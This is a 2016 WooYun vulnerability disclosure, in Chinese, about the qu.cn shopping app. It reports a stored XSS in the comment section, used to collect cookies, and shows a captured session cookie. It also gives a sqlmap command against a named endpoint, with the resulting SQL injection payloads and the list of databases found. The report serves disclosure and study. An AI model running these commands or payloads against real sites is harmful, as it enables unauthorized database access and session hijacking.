当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0213359

漏洞标题:APP安全之趣网APP存在XSS与SQL注入漏洞

相关厂商:qu.cn

漏洞作者: 我在不想理你

提交时间:2016-05-27 12:04

修复时间:2016-06-04 15:10

公开时间:2016-06-04 15:10

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-27: 细节已通知厂商并且等待厂商处理中
2016-05-27: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

趣网商城成立于2005年,是中国领先的成人文化用品电子商务及直销商。趣网B2C经营的有上千种商品,在广大用户的热心支持下,经过坚定不移的努力,趣网商城已成为目前国内专业的成人用品商城之一。随着趣网商城的知名度的影响力的不断扩大,多家知名媒体和杂志相继对趣网进行专访,并做出大篇幅报导。其中包括知名中国日报的采访与报导,从另一个角度了解趣网的成长、资质与实力。

详细说明:

趣网官网

http://www.qu.cn/


APP下载
在官网首页拉到最下面android版APP

http://s.qw.cc/app/mobile.apk?v=339


在评论的地方存在XSS,需手机端才能评论

http://app.a.qu.cn/commentslist/561.html


然后XSS收cookie

2.png


例子:

location : http://app.a.qu.cn/commentslist/561.html
toplocation : http://app.a.qu.cn/commentslist/561.html
cookie : PHPSESSID=mqohtlqhsvt03rkgbgaolcr554
opener :


没X到管理员后台
但是确找到了个注入点

sqlmap -u 'http://app.a.qu.cn/Ajax/getNewsComment.html' --data='id=546' --dbs
_
___ ___| |_____ ___ ___ {1.0.4.4#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:33:38
[10:33:38] [INFO] resuming back-end DBMS 'mysql'
[10:33:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=546 AND 6385=6385
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=546 AND (SELECT * FROM (SELECT(SLEEP(5)))NGea)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=546 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627171,0x717172694d696f4d7662756e4b717a59536750785a715266797246615a41435a6842564a685a4958,0x71716b7671),NULL,NULL-- -
---
[10:33:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[10:33:39] [INFO] fetching database names
available databases [3]:
[*] app_admin
[*] information_schema
[*] test


找到管理员后台地址

http://app.a.qu.cn/


没继续深入

漏洞证明:

如上

修复方案:

过滤关键字

版权声明:转载请注明来源 我在不想理你@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-04 15:10

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无